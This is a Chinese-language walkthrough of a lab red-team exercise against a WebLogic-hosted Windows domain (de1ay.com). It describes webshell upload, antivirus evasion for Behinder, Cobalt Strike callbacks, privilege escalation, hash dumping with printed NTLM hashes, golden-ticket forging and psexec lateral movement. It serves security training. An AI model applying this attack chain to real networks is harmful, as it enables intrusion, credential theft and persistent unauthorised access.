环境搭建
配置信息
攻击机
IP:192.168.47.128
WEB,PC 有360和防火墙
三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。
同时需要在web机开启weblogic服务
内网
首先添加一个vm2的内网自定义,设置子网为10.10.10.1/24
当虚拟机开启时,会采用已经设定过的ip地址(必须符合10.10.10开头
将DC,PC,WEB 设为 vm2 (内网环境)
外网
内网设置好了,外网这样设置
我设置的外网连接方式为NAT
将 攻击机,PC,WEB 外网设置为NAT,为了与kali在同一网段
PC与WEB做修改如下:
Dc:
Pc
Win
开启web服务
开启WEB的服务:管理员身份运行
C:\Oracle\Middleware\user_projects\domains\base_domain
信息收集
Nmap端口扫描
nmap -T4 -A -p 1-65535 192.168.163.137
由nmap扫描结果可知:
端口扫描 | 80,1433,3389,,7001,60966等 |
服务版本识别 | IIS httpd 7.5,SQL Server 2008 R2 SP2,远程桌面服务,WebLogic Server |
操作系统信息识别 | Windows Server 2008 R2 - 2012 |
域 | de1ay.com |
工具检测发现漏洞
Dir查看路劲
查看进程
木马获取shell
weblogic上传木马路径选择:weblogic上传路径
这里选择第一种
上传木马
被360查杀了
给冰蝎做免杀
GitHub - Tas9er/ByPassBehinder: ByPassBehinder / 冰蝎WebShell免杀生成 / Code By:Tas9er
生成木马
C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
查看生成成功了
但是太老了还是被查杀了
只能关闭360了不然免杀都不会做
冰蝎尝试一直失败
用哥斯拉
连接成了
cs生成监听器反弹到cs客户端
哥斯拉上传cs木马文件
Cs端收到回连
接着用ms-15权限提升
域内信息
1). 本机信息收集
得知web服务器为Windows server 2008 有两个网段
2). 域内信息收集
域名为de1ay.com 存在两台域主机web和pc 域控为DCde1ay.com主机名为DC,域管理员为Administrator
接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机。
内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_msfconsole的background挂起会话后怎么启动会话-CSDN博客https://blog.csdn.net/weixin_54977781/article/details/131178720?ops_request_misc=%7B%22request%5Fid%22%3A%22172250449416800213084897%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=172250449416800213084897&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-131178720-null-null.142^v100^pc_search_result_base9&utm_term=cobalt strike4.7%E8%81%94%E5%8A%A8msf&spm=1018.2226.3001.4187
服务器安装msf
chmod 755 msfinstall.sh && ./msfinstall.sh
Cs生成外联监听器
权力委派上线成功
新建会话
Cs抓取密码凭证
权限维持
记录域名DE1AY.com的SID值
Authentication Id : 0 ; 158137 (00000000:000269b9)
Session : Service from 0
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2024/8/5 7:02:10
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
制作黄金票据
Administrator
DE1AY.com
S-1-5-21-2756371121-2868759905-3853650604-2103
31d6cfe0d16ae931b73c59d7e0c089c0
用于权限维持
横向渗透
smb渗透
端口扫描
目标列表查看
创建smb监听
右击会话—jump—psexec64(PC为32位,需要使用psexec)
10.10.10.10上线成功了
再次端口扫描发现
10.10.10.201
同样的方法上线成功了
思考总结:
免杀不会,外网打点信息收集不全,横向不熟练,渗透框架还不够结实